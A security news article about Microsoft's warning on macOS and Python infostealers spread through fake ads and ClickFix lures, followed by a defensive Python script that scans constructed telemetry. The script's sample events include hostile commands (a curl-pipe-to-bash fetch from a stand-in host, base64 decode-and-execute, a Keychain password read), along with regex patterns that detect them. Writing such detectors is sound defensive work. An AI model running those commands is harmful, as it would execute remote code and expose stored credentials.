Microsoft Warns of Python Infostealers Targeting macOS Through Fake Ads and Installers

Microsoft has issued a warning that information-stealing malware campaigns are rapidly expanding beyond Windows systems and increasingly targeting Apple macOS environments. According to the company, attackers are using cross-platform programming languages such as Python and abusing trusted advertising and software distribution platforms to scale these attacks.

Researchers from the Microsoft Defender Security Research Team reported that macOS-focused infostealer campaigns have been active since late 2025. These operations rely heavily on social engineering, including ClickFix-style lures, to distribute malicious disk image (.dmg) installers that deploy stealer malware families such as Atomic macOS Stealer (AMOS), MacSync, and DigitStealer.

The observed campaigns employ techniques designed to evade detection, including fileless execution, abuse of native macOS utilities, and AppleScript-based automation. These methods enable attackers to extract sensitive information, including browser-stored credentials, active session data, iCloud Keychain contents, and developer-related secrets.

Microsoft noted that many of these attacks begin with malicious online advertisements, commonly delivered through Google Ads. Users searching for legitimate software tools, including DynamicLake and AI-related applications, are redirected to fraudulent websites. These sites use ClickFix prompts, typically a fake error or verification dialog that instructs the visitor to copy a command and paste it into Terminal, or to install a fake installer, ultimately leading to malware infection.

The company explained that Python-based infostealers provide attackers with flexibility and speed. These malware strains allow threat actors to quickly reuse code, adapt to different operating systems, and target diverse environments with minimal effort. Distribution often occurs through phishing emails, and the malware is capable of stealing login credentials, session cookies, authentication tokens, credit card data, and cryptocurrency wallet information.

One notable example highlighted by Microsoft is PXA Stealer, which has been linked to Vietnamese-speaking threat actors. The malware is capable of collecting browser data, financial details, and login credentials. Microsoft identified two separate PXA Stealer campaigns, in October 2025 and December 2025, both of which relied on phishing emails for initial access.

The attack chains used by PXA Stealer included persistence mechanisms such as Windows registry Run keys and scheduled tasks. Telegram was used as the primary command and control channel, as well as for data exfiltration.

In addition to phishing campaigns, threat actors have also been observed abusing popular messaging platforms like WhatsApp to distribute malware such as Eternidade Stealer. These attacks focus on stealing financial and cryptocurrency account data. Details of this activity were publicly documented by LevelBlue and Trustwave in November 2025.

Other related campaigns have involved fake PDF-editing tools, including applications branded as Crystal PDF. These tools are promoted through Google Ads malvertising and search engine optimization (SEO) poisoning. Once installed, the malware deploys Windows-based stealers that silently harvest cookies, session information, and cached credentials from browsers such as Mozilla Firefox and Google Chrome.

Microsoft advised organizations to strengthen defenses by educating users about social engineering tactics, including malvertising redirect chains, fake installers, and ClickFix copy-paste prompts. Security teams are also encouraged to monitor for suspicious Terminal activity, unusual access to the iCloud Keychain, and outbound network traffic involving POST requests to newly registered or suspicious domains.
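The ClickFix chain described earlier (a pasted Terminal command that fetches and runs a script) and the three monitoring points Microsoft recommends can be turned into a small triage pass over endpoint telemetry. The following is an added example written for this article, not Microsoft's or any vendor's detection logic: the process and network events, the domain-registration table, the hostnames (`*.example`) and the heuristic rules are all constructed for illustration, and the thresholds (30-day domain age, 100 KB POST body) are assumptions a team would tune to its own environment.

```python
"""Toy detection pass over constructed macOS endpoint telemetry.

Added example; every event, hostname and threshold below is made up.
"""
import re
from datetime import date

# Constructed process-execution events: who ran what, and from which parent.
# A ClickFix victim pastes into Terminal, so the parent is usually Terminal.
PROCESS_EVENTS = [
    {"user": "alice", "parent": "Terminal", "cmd": "ls -la ~/Projects"},
    {"user": "alice", "parent": "Terminal",
     "cmd": "echo 'aGVsbG8=' | base64 -d | sh"},
    {"user": "bob", "parent": "Terminal",
     "cmd": "curl -fsSL https://update-dynamiclake.example/run.sh | bash"},
    {"user": "bob", "parent": "osascript",
     "cmd": "security find-generic-password -ga 'Chrome Safe Storage'"},
    {"user": "carol", "parent": "Terminal", "cmd": "git pull origin main"},
]

# Constructed outbound HTTP events (host, method, request body size).
NETWORK_EVENTS = [
    {"host": "api.github.com", "method": "GET", "bytes": 812},
    {"host": "collector.example", "method": "POST", "bytes": 1_500_000},
    {"host": "cdn.example", "method": "POST", "bytes": 2048},
]

# Constructed stand-in for a WHOIS/RDAP "domain created" lookup.
DOMAIN_CREATED = {
    "api.github.com": date(2007, 10, 9),
    "collector.example": date(2025, 12, 20),
    "cdn.example": date(2015, 3, 1),
}
TODAY = date(2026, 1, 10)  # fixed reference date so results are reproducible

# Heuristic command-line rules (assumed, not vendor signatures).
PROCESS_RULES = [
    # download piped straight into a shell: the classic ClickFix one-liner
    ("remote-script-pipe",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b")),
    # decode-and-execute, a common fileless stage
    ("base64-decode-exec",
     re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(ba|z)?sh\b")),
    # AppleScript driven from a command line
    ("applescript-exec", re.compile(r"\bosascript\b")),
    # reading Keychain items with the native `security` utility
    ("keychain-read",
     re.compile(r"\bsecurity\s+(find-(generic|internet)-password|dump-keychain)\b")),
]


def classify_process_event(ev):
    """Return the indicator names an event trips (empty list if benign)."""
    hits = [name for name, rx in PROCESS_RULES if rx.search(ev["cmd"])]
    # A Keychain read whose parent is osascript rather than an interactive
    # shell is a stronger signal than either observation on its own.
    if ev["parent"] == "osascript" and "keychain-read" in hits:
        hits.append("scripted-keychain-read")
    return hits


def scan_process_events(events):
    """Return (user, cmd, indicators) for every event that trips a rule."""
    flagged = []
    for ev in events:
        hits = classify_process_event(ev)
        if hits:
            flagged.append((ev["user"], ev["cmd"], hits))
    return flagged


def scan_network_events(events, created, today, max_age_days=30,
                        min_bytes=100_000):
    """Return (host, age_days, bytes) for large POSTs to young domains.

    A host with no registration record is treated as young (age None),
    on the assumption that an unknown destination deserves a look.
    """
    flagged = []
    for ev in events:
        if ev["method"] != "POST" or ev["bytes"] < min_bytes:
            continue
        reg = created.get(ev["host"])
        age = None if reg is None else (today - reg).days
        if age is None or age <= max_age_days:
            flagged.append((ev["host"], age, ev["bytes"]))
    return flagged


if __name__ == "__main__":
    for user, cmd, hits in scan_process_events(PROCESS_EVENTS):
        print(f"[process] {user}: {hits} <- {cmd}")
    for host, age, size in scan_network_events(NETWORK_EVENTS,
                                               DOMAIN_CREATED, TODAY):
        print(f"[network] POST {size} bytes to {host} (domain age {age} days)")
```

Run as a script it prints three process findings (the base64 pipe, the curl-to-bash line, and the AppleScript-driven Keychain read) and one network finding (the 1.5 MB POST to a domain registered 21 days earlier). In production the event lists would be replaced by EDR or unified-log output and the registration table by an RDAP lookup, and the rules would be tuned against the organization's own baseline of legitimate `curl | sh` installers and developer Keychain use.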

According to Microsoft, infections caused by infostealer malware can lead to serious consequences, including data breaches, unauthorized access to internal systems, business email compromise, supply chain attacks, and ransomware incidents.
